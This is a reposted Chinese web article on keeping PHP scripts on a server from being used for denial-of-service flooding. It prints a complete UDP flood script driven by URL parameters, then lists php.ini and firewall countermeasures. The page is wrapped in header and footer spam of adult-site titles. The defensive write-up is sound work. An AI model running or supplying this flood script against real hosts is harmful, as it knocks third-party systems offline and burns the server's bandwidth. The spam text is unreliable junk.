一区二区久久-一区二区三区www-一区二区三区久久-一区二区三区久久精品-麻豆国产一区二区在线观看-麻豆国产视频

防止用戶利用PHP代碼DOS造成用光網絡帶寬

php代碼調用sockets,直接用服務器網絡攻擊別的IP,常見代碼如下:
復制代碼 代碼如下:
$packets = 0;
$ip = $_GET[/'ip/'];
$rand = $_GET[/'port/'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[/'time/'];
$time = time();
print /"Flooded: $ip on port $rand
/";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= /"X/";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(/"udp://$ip/", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo /"Packet complete at /".time(/'h:i:s/')./" with $packets (/" . round(($packets*65)/1024, 2) . /" mB) packets averaging /". round($packets/$exec_time, 2) . /" packets/s //n/";
?>

表現特征:
一打開IIS,服務器的流出帶寬就用光-----就是說服務器不斷向別人發包,這個情況和受到DDOS攻擊是不同的,DDOS是不斷收到大量數據包.
解決辦法:
禁止上述的代碼:
在c:/windows/php.ini里設置:
disable_functions =gzinflate;
在c:/windows/php.ini里設其值為Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;號一定要有,意思就是限制用sockets.dll
前面的;號要保留
然后重啟IIS
如果上述方式仍然無效,你可以在IIS中,允許的擴展中,禁止php的擴展測試.
另外,對于沒加密的php攻擊代碼,還可以用以下辦法處理:
1.在IP策略,或防火墻中,禁止所有udp向外發送
2.用一流信息監控,在SQL攔截及網址攔截中,攔截port=這個關鍵詞

php技術防止用戶利用PHP代碼DOS造成用光網絡帶寬,轉載需保留來源!

鄭重聲明:本文版權歸原作者所有,轉載文章僅為傳播更多信息之目的,如作者信息標記有誤,請第一時間聯系我們修改或刪除,多謝。

主站蜘蛛池模板: 亚洲一区二区三区高清视频 | 91在线观 | 国产无遮挡床戏视频免费 | 香蕉碰碰人人a久久动漫精品 | 精品中文字幕一区二区三区四区 | 日韩美女在线视频 | 美国一区二区三区 | 黄色美女网站免费看 | 国产精品一区二区久久不卡 | 亚洲欧美一区二区三区四区 | 亚洲综合免费 | 大学生一级黄色片 | 草草草在线| 色五月在线视频 | 国产在线观看福利 | 综合爱| 欧美videos在线观看 | 自偷自偷自亚洲首页精品 | 亚洲乱亚洲乱妇41p国产成人 | 亚欧精品一区二区三区四区 | 亚洲欧洲色天使日韩精品 | 国产成人免费午夜在线观看 | 免费大学生国产在线观看p 免费的成人a视频在线观看 | 97碰公开在线观看免费视频 | 日韩美女性行为免费视频 | 最新亚洲国产有精品 | 国产精品久久久久久福利 | 中文字幕一区二区三 | 中文字幕专区在线亚洲 | 最新精品在线视频 | 美女视频网站黄色 | 亚洲第一香蕉视频 | 欧美一区二区三区视视频 | 亚洲美女色视频 | 在线观看色| 日韩综合nv一区二区在线观看 | 午夜久久免费视频 | 精品91自产拍在线 | 欧美性活一级视频 | 911亚洲精品国内自产 | 国产毛片在线看 |